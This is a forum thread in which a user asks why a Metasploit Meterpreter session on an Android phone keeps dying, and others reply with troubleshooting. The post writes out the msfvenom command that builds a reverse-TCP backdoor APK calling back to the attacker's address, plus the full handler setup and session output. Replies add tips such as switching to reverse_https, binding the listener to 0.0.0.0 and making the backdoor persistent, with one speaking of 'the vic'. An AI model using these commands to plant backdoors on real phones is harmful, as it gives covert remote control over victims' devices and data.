Hi,
I'm looking for help in order to progress in my understanding of the use of Meterpreter over Android on a smartphone.
I currently have Kali 4.11 and the Metasploit suite on the attacker computer.
I also generated my Meterpreter payloadusing the following command :
msfvenom -p android/meterpreter/reverse_tcp LHOST=MY_WAN_IP_ADDRESS LPORT=4444 -a dalvik --platform android R -o /pentest-001.apk
Then I installed my payload over the Android 6.0.1 smartphone (a Lenovo P2) and I can see the MainActivity software installed.
Then, on the Attacker computer", I typed (see bold) :
msf > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST MY_LAN_IP_ADDRESS
LHOST => MY_LAN_IP_ADDRESS
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit
* Exploit running as background job 0.
From ther, I start MainActivity on my smartphone (connected using 4G/LTE) : I can see the following being printed on the attacker computer.
msf exploit(handler) >
* Sending stage (68925 bytes) to MY_WAN_IP_ADDRESS
* Meterpreter session 1 opened (MY_LAN_IP_ADDRESS:4444 -> MY_WAN_IP_ADDRESS:11501) at 2017-08-31 13:55:56 +0200
* negotiating tlv encryption
* negotiated tlv encryption
* negotiated tlv encryption
* MY_WAN_IP_ADDRESS - Meterpreter session 1 closed. Reason: Died
I can repeat the operation on and on, I never get the Meterpreter shell. I tried on different smartphones, BTW.
One precision : my attacker computer is behind 2 routers: Both routers forward port 4444 (first one forward to 2nd router, and 2nd router forwards to MY_LAN_IP_ADDRESS)
I also tested using port 443.
Thanks in advance for your help.
6 Responses
I also tested with only one router....
Change the WAN IP with your LAN Ip address
same problem in LAN
I also getting the same problem can you tell us what is reason..
Hey there.
I've got msf installed on my phone in termux. I tried exploiting said phone but every time i opened termux to use the session it would die. I could only imagine it was cause the backdoor wasnt persistent or being run as a service or anything so it wouldnt run in the background. Just a theory cause i was able to run the listener on my computer no problem.
Point is, maybe your having a similar issue. Maybe the vic is doing something thats killing the session.
Most phones have a setting in them to kill the wifi to save battery when the phone goes to sleep.. They may even just kill idle processes...
Maybe thats causing it.
Just a thought, its probably a long shot tho.
Ive also heard of people just using reverse_https instead. If all else fails id scrap the apk and try, try again lol
msf > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit
Share Your Thoughts